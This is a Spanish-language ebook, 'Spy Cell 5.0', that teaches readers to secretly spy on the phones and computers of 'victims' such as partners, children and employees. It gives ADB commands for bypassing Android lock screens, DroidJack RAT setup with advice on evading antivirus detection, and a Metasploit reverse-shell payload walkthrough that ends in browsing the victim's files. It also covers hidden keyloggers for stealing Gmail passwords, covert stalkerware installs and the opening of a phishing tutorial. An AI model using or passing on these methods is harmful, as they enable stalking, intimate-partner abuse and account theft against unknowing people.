Spy Cell 5.0 PDF
Spy Cell 5.0 PDF
Spy Cell 5.0 PDF
Totalmente Gratis
Page | 1
Estrategias Avanzadas Para Espiar Celulares: La Guía Paso por Paso de Espionaje Altamente
Efectivo, ©2015 Todos Los Derechos Reservados. Advertencias: Al continuar leyendo este libro
electrónico, usted declara que es mayor de 18 años y que es legal leer y poseer este material en su
país y/o jurisdicción. Usted acepta y está de acuerdo al leer esta información que el autor, el editor,
el propietario, accionistas, afiliados y empleados de Exur, S. A. y de Comoespiarmoviles.net no
aceptan o asumen ninguna responsabilidad o compromiso por el uso indebido o abuso de del
contenido de este libro electrónico y expresamente se desligan de todas las garantías implicadas.
Este libro electrónico está hecho para fines educativo. Exur, S. A. no garantiza que el documento o
información esté libre de errores, ajustada a su propósito cumplirá cualquier criterio en particular
por el desempeño o la calidad.
Page | 2
Tabla de contenido
Métodos anti-espionaje
Anti-Spy Mobile Free (Página 90)
Page | 3
Rooteo de Android (Acceso Root)
Tutorial King Root (Página 90)
Page | 4
Introducción
Quizás le parezca un poco exhaustiva y larga toda esta información, pero permítame decirle que no
necesitará todo lo que está escrito aquí. Esta guía está divida en diferentes tipos de estrategias
para darle la comodidad y libertad de elegir la que necesite. Este video de introducción le ayudará a
entenderlo mejor: http://mfi.re/watch/4625lyhrxlqd46a/Introducción_Spy.mp4
Este material instructivo está diseñado para que se libere fácilmente de las dudas y tenga paz
mental con asuntos relacionados con la familia, los negocios y la vida amorosa, ya que gracias a la
excelente decisión que ha tomado al elegir este magnífico libro electrónico, tendrá la oportunidad
de ver por usted mismo(a) lo que realmente hacen sus hijos, sus empleados y su pareja a través de
un monitoreo constante de sus celulares y computadoras. Y todo esto de manera increíblemente
fácil. De hecho, este libro está hecho mostrando cada paso con imágenes de qué hacer en cada
ocasión, brindándole así un servicio personalizado de antemano; es por esto que puede estar
totalmente seguro(a) de que sus dudas terminan aquí sin importar cuál sea su nivel académico, ya
que los pasos son tan sencillos que hasta un niño de 4 años de edad puede seguirlos.
En este contenido trataremos diversos temas de diversas aplicaciones y tecnología que hacen
posible el espionaje efectivo de celulares y computadoras, y lo mejor de todo, que es 100% Gratis!
No tendrás que pagar un centavo para adquirir los programas ni las aplicaciones, aunque hay
algunas funciones que están a opción suyas si comprarlas, pero le aseguro que con solo la versión
gratis será más que suficiente, ya que no tendrá límite de tiempo en la libertad de sus acciones y
logrará la paz mental que necesita.
Los requisitos para cada estrategia serán explicados en cada lección. ¡Tenga una magnífica
expedición!
Page | 5
Métodos de Desbloqueo de Patrón de
Seguridad para Smartphones
En esta parte aprenderemos cómo desbloquear las pantallas de seguridad para ingresar a la
mayoría de dispositivos, incluyendo teléfonos Androids Rooteados como Androids no Rooteados.
También para las diferentes versiones de iPhone.
Obviamente si queremos ingresar al móvil de la víctima, necesitamos alguna estrategia. Ya sea
esperar a que se descuide y deje el celular desbloqueado, o… algo mucho mejor XD, Muahahaha!
Si tomamos el celular de la víctima, en la mayoría de los casos, como tú mismo sabrás si usas
Smartphone, nos encontremos con molestas pantallas de seguridad como las siguientes:
Page | 6
Existen patrones de seguridad por huellas dactilares.
Entre otros patrones. La verdad es que todos estos patrones pueden ser burlados con los siguientes
métodos que aprenderás a continuación.
Requisitos
Android de la víctima en mano, tiene que ser un android no rooteado.
Un ordenador dónde instalar el programa ABD
Instalar el programa ABD en el ordenador
Conectar el Android a la PC vía USB y seguir los procedimientos a continuación
La opción “USB Debugging” (Depuración USB) debe estar habilitada
Estas son descargas automáticas, basta con solo poner el link y comenzará a descargarse.
Page | 7
Instalación de Drivers ADB
Los drivers ADB son las configuraciones que permitirán la instalación del programa ADB, los pasos
de instalación son muy sencillos.
Page | 8
Paso 4: Nos pide confirmación nuevamente para otra instalación, pulsamos “Y” y Enter.
Paso 6: Nos aparecerá un resultado que dice “Installing… driver”. Aparecerá una pestaña de
instalación, pulsamos siguiente y finalizamos la instalación. Y ya tendremos instalado el ADB. En
caso de que no funcione puedes buscar ayuda en la misma página donde lo descargaste. Para
comprobar si ya está listo, solo abrimos una terminal y ponemos “adb”, el resultado mostrará todo.
Page | 9
Ejecución de ADB
Paso 1: Procedemos a conectar el cable USB desde la PC al dispositivo, estando bloqueado. Como
ahora.
Paso 3: Una vez abierta, nos aparecerá una terminal como esta, en la cual pondremos nuestras
líneas de comandos para desbloquear el dispositivo. Lo primero que debemos digitar es el
comando “adb shell”.
Page | 10
Paso 4: Digitamos el siguiente comando en la terminal: “rm /data/system/gesture.key” como
puedes ver a continuación. Pulsamos “Enter” para ingresarlo. De esta manera la seguridad queda
desbloqueada. Ahora, lo que debemos hacer es sencillamente reiniciar el dispositivo para que haga
efecto.
Paso 5: El siguiente paso es ingresar el comando: adb Shell y luego # reboot para reiniciar.
Pulsamos “Enter” una vez más.
Page | 11
Inmediatamente después de haber escrito el comando, el dispositivo comienza a reiniciarse. Esto
es buena noticia. Esperamos a que termine el reinicio.
Paso 6: Una vez terminado el reinicio, la operación habrá sido un éxito. Ahora ponemos cualquier
patrón y la pantalla se desbloqueará. Sin importar cuán ridículo sea, cualquier cosa que intentemos
violará la seguridad. Como ves en la siguiente imagen y la que le sigue.
Existe la posibilidad de que este método no le funcione, ya que puede funcionar para una
determinada cantidad de modelos Android. Por eso existe otra estrategia alterna a ésta, que es la
siguiente.
Page | 12
Opción #2
Este es un camino más largo, pero si el primer método te falló, este es el que debe funcionarte.
Digitamos “adb shell” y luego el comando que puedes ver debajo, “cd
/data/data/com.android.providers.settings/databases”.
Después de digitar lo anterior, nos aparecerá un resultado como el siguiente. Luego ponemos el
siguiente comando: “update system set value=0 where name=’ lock_pattern_autolock’ ;”.
Page | 13
Aquí ya tenemos el celular desbloqueado. Pero no debemos dejarlo sencillamente así. Lo más
recomendable sería ir a cambiar la configuración de seguridad para añadirle un nuevo patrón de
desbloqueo, cambiando el estilo, le ponemos uno que solo tengamos mover un ícono para abrirlo.
Esto debemos hacerlo para que sea menos notable para la víctima que su celular haya sido
hackeado, aunque obviamente se puede dar cuenta de que ese no era su patrón de desbloqueo.
En este caso debemos dejarle en patrón de desbloque más sencillo, de esa manera, la víctima
puede llegar a pensar que sencillamente el celular tuvo algún error técnico y lo más probable es
que lo deje así, ya no que no presentará ningún otro inconveniente.
Lo más probable es que la víctima cambie su patrón nuevamente a uno más seguro. Esto no
importa, porque ya para ese entonces habremos instalado nuestra aplicación espía al teléfono de la
víctima. Sin importar lo seguro que sea su patrón, ya el daño está hecho y no le servirá de nada. De
ahí en adelante la información del teléfono irá hacia nosotros automáticamente, trayendo consigo
la información de contactos, mensajes, llamadas, grabación de llamadas, datos multimedia, etc. La
información del celular queda bajo nuestro dominio, donde será enviada por internet a nuestro
correo electrónico, o a la página oficial de la aplicación, dependiendo de cuál aplicación instalemos
en el teléfono de la víctima.
Ahora bien, también tenemos la opción de sencillamente violar la seguridad para instalar la
aplicación espía, ocultarla, y luego desconectar el dispositivo del teléfono; lo cerramos y cuando lo
volvamos a abrir en patrón de seguridad seguirá estando ahí, como si nada hubiese pasado.
Probablemente esta sea la mejor opción en la mayoría de los casos, pero en realidad todo
dependerá de las circunstancias. Es usted quien debe determinar de qué manera le conviene más.
Page | 14
Paso 7: Vamos a las configuraciones, pulsamos “Settings”.
Ya sea en el escritorio como en el menú general. Debe
aparecernos esto. Con símbolo de llave o rueda mecánica.
Page | 15
Paso 10: Elegimos el patrón llamado “Slide” o de
Deslizamiento. Con el cual la víctima podrá abrir
su teléfono deslizando el ícono del candado en la
pantalla inicial.
Page | 16
Desbloquear pantalla de seguridad Android (rooteado):
Requisitos
Android de la víctima en mano, tiene que ser un android “rooteado”.
Un ordenador dónde instalar el programa ABD
Instalar el programa ABD en el ordenador
Conectar el Android a la PC vía USB y seguir los procedimientos a continuación
La opción “USB Debugging” (Depuración USB) debe estar habilitada.
Page | 17
Paso 3: Escribimos el comando: adb devices en la nueva terminal que se abrirá, cómo la siguiente.
Esto sirve para mostrar todos los dispositivos android que estén conectados a la PC; en este caso,
solo uno.
Paso 4: Escribimos el siguiente comando en la terminal, como vemos en esta lista, el número 2.
Pulsando “Enter”.
Paso 5: Ingresamos el comando que sigue en la lista y “Enter”. El comando cd data/system sirve
para convertir los patrones de seguridad en datos leíbles para el sistema.
Page | 18
Paso 6: Continuamos con el siguiente comando de la
lista. Con el cual podremos habilitar la función de Super
Usuario.
Paso 7: Finalizamos con el último comando. En cual eliminará del teléfono todos los datos de
seguridad, permitiendo así la entrada fácil.
Cuando mires el teléfono, todavía tendrá el patrón. No hay de qué preocuparse, pulsa cualquier
patrón y se desbloqueará inmediatamente, sin importar cuál sea. Ya que ya no cuenta con registros
de seguridad. Entonces procedemos a instalar la aplicación espía que más le convenga, que más
adelante le mostraremos una buena cantidad de ellas que realmente funcionan. Puedes dirigirte a
la sección “Métodos de espionaje para android”.
Page | 19
Desbloquear pantalla de seguridad iPhone:
Ahora aprenderás cómo desbloquear cualquier pantalla de seguridad iPhone, guardando nuestros
datos en la base de datos iTunes y reiniciando el teléfono sin perder la información. La víctima no
notará que eso sucedió con su teléfono. Pero se corre el riesgo de perder todos los datos en caso
de que no tengamos acceso a la PC de víctima, donde debería estar instalado el programa iTunes.
Por eso le sugiero que siga los pasos con sumo cuidado. No nos hacemos responsables de sus
errores.
Requisitos
iPhone de cualquier modelo
Un ordenador con iTunes instalado (Muy preferiblemente que sea el ordenador de la víctima)
Conectar el iPhone a la PC vía USB y seguir los procedimientos a continuación
Page | 20
Paso 2: Mantenemos pulsado el botón de inicio.
Page | 21
Paso 4: Pulsamos el botón “Restore iPhone”
Paso 5: Aparecerá una pantalla de confirmación en la se nos da dos opciones, pulsamos la que dice
“Restore and Update”.
Una vez presionamos “Restore and Update”, nos aparecerá una barra en la parte de arriba de la
pantalla indicando la extracción de software que se instalará en el iPhone.
Page | 22
También en el iPhone aparecerá la barra de
progreso.
Page | 23
Paso 6: Habilitamos los servicios de locación o lo deshabilitamos.
Page | 24
Si quieres crear un Apple ID puedes crearlo, pero no lo recomiendo
si es el teléfono de la víctima, puede arruinar toda la operación. Lo
mejor es que lo saltemos pulsando Skip This Step.
Page | 25
Guardar copia de seguridad iOS en iCloud:
Es de suma importancia guardar una copia de seguridad de todos los datos
del teléfono antes del proceso, de esta manera nos aseguramos de no perder
nada.
Para hacer una copia de seguridad en iCloud hacemos lo siguiente:
5. Toque “Back Up Now". Mantente conectado a tu red Wi-Fi hasta que el proceso se complete.
6. Asegúrate de que la copia de seguridad haya terminado tocando Settings> iCloud> Storage>
Manage Store, y seleccione su dispositivo. La copia de seguridad que acaba de hacer debe aparecer
en los detalles con su respectivo tiempo y tamaño.
De esta manera ya no tendremos que preocuparnos en caso de que algo salga mal.
Después de haber activado la copia de seguridad de iCloud, iCloud puede automáticamente hacer
un Back UP de tu dispositivo cada día. iCloud ejecuta estas copias de seguridad automáticas diarias
sólo si:
El dispositivo está conectado a una fuente de alimentación.
El dispositivo está conectado a una red Wi-Fi.
La pantalla de su dispositivo está bloqueado.
Page | 26
Guardar copia de seguridad iOS en iTunes:
1. Abre iTunes y conecta el dispositivo al ordenador.
2. Guardar el contenido que has descargado desde la tienda de iTunes o App Store haciendo clic en
File> Devices> Transfer Purchases. Si utilizas Windows y no ves un menú “File”, pulsa la tecla Alt.
Espere a que iTunes termine la transferencia de sus compras. A continuación, haga clic en Files>
Devices> Back Up. Si utiliza Windows y no ver un menú Archivo, pulse la tecla Alt.
Page | 27
Después de que termine el proceso, se puede ver si la copia de seguridad ha finalizado
correctamente, haga clic en Preferencias de iTunes> Dispositivos. Debes ver el nombre de tu
dispositivo con la fecha y hora que iTunes haya creado la copia de seguridad.
Page | 28
Métodos de Espionaje para Android
Esta sección está dedicada a los métodos infalibles para espiar celulares Android. Todo explicado
en todo detalle en lenguaje sencillo para asegurarnos de que lo comprenda a plenitud y pueda
comenzar su espionaje efectivamente.
Autor:
--------
L.R Sanjeevi (c) 2015.
Actualizaciones de la versión 3.3:
-----------------
* Lector de WhatsApp – Para dispositivos root solamente.
* Activación por llamada – Activa la conexión de internet en dispositivos desconectados con solo
llamar desde un número en específico.
* Cambiador de íconos – Puedes cambiar el ícono de su APK en el APK Generator.
* Reset DroidJack Server – Reinicio del servidor DroidJack para mejorar la eficiencia si es necesario.
* Reset Data Transfer port – En caso de cualquier inconveniente, use esta opción para reiniciar el
puerto de transferencia.
* Nota personal – Una nota para guardar cualquier información personal del dispositivo.
* Se corrigieron errores del Remote Eyes entre otros bugs menores.
Page | 29
Instrucciones de configuración:
--------------------
1) Registrar un DNS dinámico de no-ip o dnsdynamic.com
2) Elegir un puerto (Ejemplo: 1337), redirigir el puerto elegido (1337) y el puerto 1334 (por
defecto), por lo cual necesitas abrir 2 puertos!
3) Generar la APK con el puerto elegido (1337) y su DNS dinámico, entre otros detalles!
4) No escané su aplicación generada en la página Virustotal.com, para que pueda mantenerse
indetectable por más tiempo.
Tutorial detallado:
-------------------
Conectividad WAN (Via Internet)
-------------------------------
1) Entre su dirección no-ip en la casilla Dynamic DNS y su puerto (Ejemplo: 1337) en la casilla “port”
mientras se genera la aplicación.
2) Actualice el no-ip usando el no-ip DUC.
3) Abra el puerto elegido (1337) y el puerto por defecto 1334 (ambos en protocolo TCP y UDP).
********************* Pasos opcionales *********************
4) Active el puerto 1334 (por defecto) en el DroidJack, en la sección “Devices”.
5) Verifique si el puerto 1334 (default) está abierto haciéndole un escaneo en este enlace
http://www.whatsmyip.org/port-scanner/. (También verifique si el puerto 1334 (default) se
muestra abierto aún si no lo estamos usando con el DroidJack. Esto es solo para asegurarnos de
que ningún otro software esté usando el puerto por defecto 1334.
**********************************************************
6) Active el puerto (1337) en DroidJack.
7) Verifique si el puerto elegido (1337) está abierto. (Verifique también si el puerto 1337 se
muestra abierto cuando su conexión NO ha sido habilitada en el DroidJack. Esto es solo para
asegurarnos de que ningún otro software esté usando el puerto elegido (1337).
8) Instale la aplicación en su teléfono y ábrala.
9) Conecte el móvil víctima vía data móvil o a cualquier otro WiFi alrededor de mundo.
Page | 30
5) Conectese a su misma LAN (Red de área local) donde su computadora está conectada vía WiFi o
cableado.
Preguntas Frecuentes:
-------
3) No estoy teniendo la conexión con el dispositivo, aun asegurándome de haber producido bien la
aplicación!
Resp) Verifique si está tratando de conectarse en su misma red local o de otra conexión y siga el
tutorial que corresponde con el procedimiento que quiere hacer. Si el problema persiste entonces
desactive su firewall o añada una excepción en el firewall.
6) Estoy teniendo un error cuando intento ligar la aplicación con un juego o de otro tipo!
Resp) Intente mezclar el virus con otra aplicación o juego. Algunos juegos o aplicaciones están
diseñados para auto-escanearse y no permiten la mezcla.
7) He mezclado el virus con otra aplicación que funciona bien pero no obtiene la conexión!
Resp) Una vez que la aplicación mezclada es instalada e abierta, el dispositivo necesita
desconectarse del internet y conectarse de nuevo, entonces ahí se conectará al cliente.
8) Puedo usar un puerto diferente que no sea el 1334 (puerto por defecto)?
Resp) No. El puerto 1334 es el que debe estar abierto solo para el DroidJack.
19) Algunas características estaban funcionando pero despúes de abrir una de ellas se congeló, y
después de eso ninguna otra característica funciona!
Resp) Reinicie el puerto de transferencia haciendo click en la etiqueta "Status:" (Cerca de la casilla
que dice: “port number”, ahí aparecerá la etiqueta llamada saying "Status:".
20) Qué tipo de nombres son permitidos en la función "Change Package Name"?
Resp) El paquete debe estar escrito en minúsculas. Solo puede contener letras y números. Puede
tener un punto entre palabras pero no al principio ni al final. (Ejemplo: El nombre del paquete
puede ser "hello.world" pero no "hello.world.”
Page | 32
Hackear móvil Android con Kali Linux y Metasploit:
En este tutorial aprenderemos a hackear cualquier móvil Android usando las consolas msfpayload y
msfconsole en Kali Linux. Esto debe instalarse un su PC, no en la PC de la víctima. No necesita
acceso físico al celular de la víctima para hackearlo.
Requisitos:
Kali software en el sistema operativo Linux (solamente).
Framework Metasploit actualizado.
Características fundamentales
Page | 33
Paso 2: Ponemos “ls” en la línea de comandos e ingresamos.
Ahora el archivo ya se ha creado, entonces solo debemos enviar el archivo a la víctima y tendrá que
instalar ese archivo de aplicación en su celular android.
Paso 3: Pero antes de eso, para aceptar conexiones, necesitamos ir a “msfconsole”, digitando:
“msfconsole” en una nueva terminal:
Page | 34
Tomará algo de tiempo, esperamos pacientemente… Luego aparecerá una pantalla similar a esta:
Paso 4: Ya lo tenemos, entonces en esa nueva terminal que aparece, la “msfconsole”, vamos a
buscar el multihandler. Ponemos la siguiente línea de comandos: “search multi/handler” de la
siguiente manera.
Page | 35
Pulsamos “Enter” y nos aparecerá el siguiente resultado:
Page | 36
Paso 6: Configuramos el “payload” que habíamos tomado en “msfpayload”
(android/meterpreter/reverse_tcp), entonces insertamos “set PAYLOAD
android/meterpreter/reverse_tcp” y la terminal se verá como la siguiente:
Paso 7: Ponemos las opciones como LHOST y LPORT (la misma que hemos dado en “msfpayload”).
Para eso ponemos “show options”.
Page | 37
Paso 8: Ahora solo debemos cambiar el LHOST. (Si es que en su pantalla no le aparece, lo puede
configurar manualmente). Podemos utilizar el siguiente comando: “set LHOST 192.168.0.121”.
Una vez hecho esto, el valor para LHOST ya fue definido. Podemos digitar nuevamente “show
options” para ver los nuevos valores de LHOST y LPORT.
Page | 38
Paso 9: Digitamos “exploit” y aparecerá algo como esto. En la segunda línea de los resultados
veremos: “Starting the payload handler…”
Ahora todo ya está configurado. Solo esperamos a que la víctima cliqué en el archivo que creaste.
Una vez caiga en la trampa, recibirás una conexión “meterpreter”. La terminal se verá como la
siguiente:
Page | 39
Para más información de lo que hemos hecho, digitamos en comando “sysinfo”. Vemos que el
resultado en OS narra una unión entre Linux y Android.
Page | 40
Para revelar la información contenida en el android, ponemos los siguientes comandos en orden:
“pwd” luego “cd..” seguido de “cd /” y “ls”. Como en la siguiente imagen:
Page | 41
Paso 10: Ingresamos a la tarjeta SD con los comandos: “cd sdcard” y “ls” como la siguiente imagen:
Page | 42
… y podemos ver las aplicaciones que ese individuo ha descargado.
Page | 43
Lost Android:
Esta maravillosa aplicación fue diseñada con el propósito de ayudarte a encontrar el dispositivo
perdido o robado sin importar en qué parte del mundo se encuentre.
Características fundamentales
La aplicación no hace ningún sondeo a servidores externos, así que no hace gastos extras de
batería.
Page | 45
La víctima recibirá una notificación como ésta que dice “Lost
Android” (pie de página), por la cual quizás comience a
preguntarse qué es eso. Es ahí donde debemos usar ingeniería
social solo en caso de que la víctima sospeche que su cuenta de
Gmail ha sido hackeada. Es muy probable de que la víctima
sencillamente la abra y no encuentre nada interesante en ella, y
termine dejándola quieta sin saber qué es.
Page | 46
Paso 3: Ya instalada y activada la aplicación, vamos a la página oficial “AndroidLost.com” en la cual
abriremos una cuenta con el mismo Gmail de la víctima. Solo debemos pulsar el botón “Registrar”
que está situado en la esquina superior derecha de la pantalla.
Paso 4: Ya ingresada la cuenta de Gmail, podemos acceder a los controles que nos permitirán
manejar todas las funciones que queramos manejar, como las ya mencionadas anteriormente. Las
imágenes a continuación mostrarán solo una parte de todo lo que puedes hacer en cada una de las
secciones.
Page | 47
l
Page | 48
Page | 49
Page | 50
Desinstalación:
Page | 51
Vamos a la sección de aplicaciones descargadas donde
veremos la aplicación Personal Notes…
Page | 52
Cell Tracker:
Cell Tracker te permite realizar un seguimiento de los lugares a donde quiera que esté visitando, su
propio celular o el de la víctima.
Solo pones intervalos de tiempo para registrar la ubicación y guardarlo en la base de datos, y
puesta en el rastreador celular. Al final del día se puede comprobar cuáles lugares fueron visitados
con ubicaciones guardadas en google maps. Descárgala de Google Play.
Características fundamentales
Requisitos
Teléfono Android Compatible
Interfaces
Lista de ubicaciones
Page | 53
Trazos de las ubicaciones recorridas
Page | 54
Métodos de Espionaje para iPhone
Si tenemos un iPhone, deberíamos saber que existen programas que desbloquean el Sistema
operativo del teléfono, habilitándolo para reconocer aplicaciones no le pertenecen, o más bien,
que no fueron diseñadas para que fuera compatible con él. Es por esto que cuando se trata de
aplicaciones de espionaje, es de suma importancia conocer el “Jailbreaking” y en qué consiste, ya
que es lo permitirá la instalación de la mayoría de aplicaciones; si ya lo sabe, puede continuar; si
no, es recomendable que se dirija al Apéndice Software y Términos para conocerlo a detalle.
Procedemos a ejecutar el “Jailbreak”.
Paso 1: Confirmar que la versión iOS del dispositivo sea 8-8.1.2 o 8.2 beta. Verifique la versión a
través de:
Settings > General > About > Version
Si por casualidad el proceso de Jailbreak falla descargue la última versión del Firmware y flasheala. Luego vuelve a
intentar el Jailbreak.
1. Apaga el código de acceso a través de: Settings (Configuraciones) – Passcode (Código de acceso)
- Turn Passcode Off (Apagar código de acceso)
2. Apague "Find my iPhone" a través de: Settings (Configuraciones) - iCloud - Find my iPhone - Haga
clic para desactivar.
Paso 4: Descarga y abre la Taig Jailbreak Tool para iOS8, haga clic en el botón "Start", y el programa
se ejecutará de forma automática, no necesita otra operación. Durante el Jailbreak, por favor,
mantenga la conexión al dispositivo estable y espere pacientemente.
Page | 55
Después del Jailbreak, el dispositivo se reiniciará automáticamente. A continuación, puede ver el
resultado.
Abra su dispositivo, Cydia se muestra en la pantalla, y jailbreak untether está acabado. Ahora
puedes disfrutar libremente con su iPhone desbloqueado.
Page | 56
Jailbreak para otras versiones iOS
Existen otros softwares gratuitos de ayuda para hacer Jailbreak en los demás sistemas iOS más
antiguos, he aquí una lista para que te guíes a conseguirlos si los necesitas:
Existe una guía para hacer Jailbreak paso por paso para cualquier iPhone, echa un vistazo al link.
http://ijailbreakguide.com/
Page | 57
Ejecutando Android en iPhone:
Todo lo que necesitas para empezar es un dispositivo iOS; En este momento, el iPhone 3G tiene el
mejor apoyo, y eso es lo que estamos utilizando en esta guía.
Page | 58
Paso 4: Ahora lance el Bootlace de nuevo. Pulse el botón Openiboot y pulse “Install”, entonces
“Continue”. Opniboot se descargará e instalará.
¿Cómo funciona?
Lo primero a destacar es que Android en el iPhone no está tan cerca o listo para usarse como su
sistema operativo original de tiempo completo. Eso no quiere decir que nunca será, pero por el
momento, esto es algo más que te gustaría hacer para cumplir con tu curiosidad, y probar unas
cuantas aplicaciones android útiles.
Page | 59
El iPhone 3G es el mejor dispositivo iOS compatible (y de momento sólo él y el 2G trabajan con el
método anterior, creo). El mayor problema en este momento con el 3G es la administración de
energía (PMU en el wiki), que no es completamente funcional. Lo más importante, la suspensión de
la batería aún no está disponible, por lo que su batería puede no durar mucho.
Page | 60
Mobipast:
Tutorial paso a paso de una de las mejores aplicaciones gratis de
espionaje para Smartphone. Debe instalarse en controlador en tu
celular, y el software espía en el celular de la víctima. A continuación los
pasos.
Requisitos
Smartphone iPhone/Android
Conexión internet constante
Características
Rastreo de ubicación por GPS
Historial de Internet
Captura de código de seguridad de los bloqueos
Registro de lista de contactos
Page | 61
Paso 2: Seleccione “Manage”
Page | 62
Paso 5: Pulse el botón “Add”.
Page | 63
Paso 8: Seleccione la línea 123.mobipast.com
Page | 64
Paso 11: Pulse el botón “Confirm”
Page | 65
Paso 13: Abrimos la aplicación y vamos a nuestra
cuenta.
Page | 66
Descarga del Software de espionaje iPhone
Para descargar el software de monitoreo solo debe seguir los pasos anteriores del Paso 1 al Paso 9,
que es cuando elegimos el archivo de instalación:
Page | 67
Pulsamos el botón “Sign In”
Page | 68
BosSpy:
Bosspy, es el primer software espía para Iphone 100% gratuito.
Características fundamentales
Después de eso, podrás recibir directamente por correo electrónico a cada hora el informe
keylogger, contiene todos los mensajes de chat WhatsApp, yahoo, y Skype.
Puedes capturar cualquier contraseña, de facebook, correo yahoo, gmail, hotmail, etc ...
Guía de Instalación
Page | 69
Paso 3: Selecciona “Sources” (Si no ves esa pantalla ve
directamente al siguiente paso).
Page | 70
Paso 6: Introduzca el link 1mole.bosspy.com y pulse sobre el botón
“Add Source.”
Page | 71
Paso 9: Ahora pulse la entrada Smartphone.
Page | 72
Paso 12: Espere unos segundos. Pulse el botón OK para permitir
1mole localizar el teléfono, entonces toque en el botón de reinicio
del dispositivo.
Page | 73
Paso 15: Introduzca la dirección de correo electrónico y contraseña
de su cuenta Bosspy, pulse el botón OK.
Paso 16: Tienes las opciones para ocultar Cydia o desinstalar 1mole
si no necesitas supervisar más.
Page | 74
Métodos de espionaje para PC
Livesnoop:
LiveSnoop es un servicio de vigilancia diseñado para el monitoreo de infantes basado en
almacenamiento en internet.
¿Si estás preocupado(a) por lo que tu hijo está haciendo en Internet? LiveSnoop es una excelente
opción. Proporcionan un servicio de monitoreo que permite a los padres para ver información
detallada acerca de todo lo que sus hijos hacen en línea. Mejor aún, los padres pueden recibir
alertas instantáneas sobre la base de la actividad de sus hijos.
Las características básicas de este servicio son absolutamente gratis y empezar sólo toma unos
pocos minutos!
Características fundamentales
Page | 75
Tutorial Livesnoop
Si ya tenemos una cuenta, pulsamos “Get Started” en la página de inicio y ponemos nuestro correo
electrónico en sección Sing In, pulsamos el botón para ingresar.
Page | 76
Una vez iniciamos sesión en nuestra cuenta ya creada, vemos estas opciones en la siguiente
imagen.
Premium: Compara las características gratuitas con las Premium
Device Info: Ver la información de los dispositivos monitoreados
Install: Para instalar el software en un dispositivo
Help: Obtenga ayuda
Activity: Vea la actividad de los dispositivos registrados
Device Settings: Cambiar configuraciones de tus dispositivos
Remove Device: Remover Livesnoop de un dispositivo.
Sign Out: Salir
Alerts: Ver las alertas generadas por tus dispositivos
Account Settings: Cambiar configuraciones relacionadas con la cuenta
Support: Contacte el servicio técnico Livesnoop
Nos dirigimos a la parte “Install” para instalar el software de espionaje en la computadora víctima.
Ahí veremos las instrucciones. Elegimos para Windows ya que para Android todavía no está
disponible.
Page | 77
A continuación aparecerán dos opciones, que son “Instalar en este dispositivo” e “Instalar en otro
dispositivo”.
En ambos casos aparecerán las instrucciones de cómo hacerlo. Cuando instalamos en otro
dispositivo, solo debemos descargar el software pulsando el botón “Download Client”, luego
tomamos la descarga y la llevamos al dispositivo víctima, ya sea por correo o en una memoria en
instalamos. La instalación no se notará ya que es totalmente invisible, así que no te preocupes si no
la ves. Inmediatamente la PC pedirá un reinicio, lo aceptamos.
Page | 78
Cuando vamos a la parte de Activity vemos los registros de las actividades de los dispositivos
monitoreados. A la izquierda vemos la lista de dispositivos agregados, en esta imagen contamos
solo con uno, llamado Cristología-PC.
Page | 79
Revealer Keylogger Free 2.0:
Revealer Keylogger es un potente algoritmo que puede grabar todo lo que se escribe en el teclado,
incluyendo contraseñas, independientemente de la aplicación utilizada (Skype, Facebook, MSN,
AOL, ICQ, AIM, GTalk, etc.).
Este software, en el caso de espiar celulares, podría utilizarse como poderosa estrategia para
capturar la cuenta Gmail de cualquier persona a la cual tengas acceso a su computadora. Basta con
instalar el software y ocultarlo, que de por sí es difícil de detectar.
Requisitos
Una PC de cualquier tipo de sistema operativo
Acceso a ella (ya sea por algún descuido de la víctima, o que conozcas la contraseña para acceder)
Dónde descargarlo
http://www.logixoft.com/
Page | 80
Nos redirigirá a una página externa llamada “download.cnet.com”, no hay problema, es normal. Es
ahí donde la descarga se iniciará automáticamente.
Paso 2: Una vez la descarga esté completada, buscamos el archivo en la carpeta de descarga. Lo
ejecutamos. Nota: Puede ser que el antivirus lo detecte como archivo malicioso, es normal, ya que
este software de por sí es malicioso, está diseñado para robar toda información que sea digitada
por el teclado; pero esa es la idea, para poder obtener la cuenta de Gmail de la víctima. Nos
aparecerá una ventana como esta en la cual tenemos dos opciones, Instalar ahora, que es la
primera, o Personalizar. Si queremos que el software quede totalmente oculto, vamos a instalar
ahora; aunque no te lo recomiendo totalmente pues queda tan bien ocultado que se dificulta
encontrarlo. Lo mejor es la opción “Customize”; ya que así podemos elegir ponerla en el escritorio
a modo de prueba y luego
moverla y esconderla
donde queramos.
Page | 81
Paso 3: Para abrir la aplicación, sencillamente pulsamos las teclas Ctrl + Alt + F9 para abrirla como
un atajo. También podemos dar doble click en el ícono de la aplicación que aparece en escritorio.
Vamos a pulsar el botón que está en la esquina superior izquierda de la pantalla, llamado “Start”,
con el cual daremos inicio al espionaje. Al cabo de un minuto, el programa estará registrando
información de todo lo que se digite con el teclado. Como puedes ver en la siguiente imagen, al
lado derecho se muestran los registros de todo lo que se ha digitado, tanto en el buscador Google,
como en documentos Word, también en el traductor de Google.
Paso 4: Procedemos a ocultar el programa en alguna parte extraña del computador, que
difícilmente la víctima revise. Entonces inventamos algún tipo de estrategia o excusa para que la
víctima termine ingresando a su cuenta de Gmail. En algún momento de descuido, podemos
acceder al computador y abrir el programa, quien nos estará diciendo todo lo sucedido. Entre la
información recaudada, buscaremos la que se relacione con la cuenta de Gmail, capturamos y
guardamos la contraseña, con la cual accederemos y completaremos el espionaje a su celular.
Page | 82
Métodos de Phishing (Hack de correos y
contraseñas)
El término Phishing puede aplicarse a una buena variedad de métodos utilizados para obtener de
manera fraudulenta información personal confidencial, como correos, contraseñas e
información bancaria, entre otras cosas. Ahora bien, volvemos a dejar claro algo. Lo que vas a
aprender aquí, es solo con el propósito de obtener el Gmail de la víctima con el propósito de
instalarle una aplicación espía remotamente, y de esta manera tomar control de los datos del
teléfono. Esto solo se debe emplear por motivos de protección y recaudación de información
por motivos de ansiedad y desconfianza amorosa. Sin embargo, aunque sea por ese motivo, la
práctica sigue siendo ilegal. Por lo cual cada quien es responsable de lo que haga con esta
información, presentada acá por motivos educacionales.
Tutorial
¿Cómo lo haremos?
Simplemente siga los pasos a continuación y le aseguramos que su Phishing estará listo 100%
exitosamente.
Page | 83
Paso 1: Crear un dominio, ya sea gratis o pago. Es bastante fácil. Solo debes dirigirte a páginas
donde brinden este servicio gratuito y registrarte, así de sencillo. En caso de que se te esté
dificultando hacerlo en una de estas páginas, puedes probar otras páginas que de igual manera
funcionarán y ver tutoriales en YouTube de cómo crear un dominio, hay muchos tutoriales de eso.
Page | 84
Paso 2: Una vez creado el dominio, descargamos el cliente FileZilla, que es un programa que nos
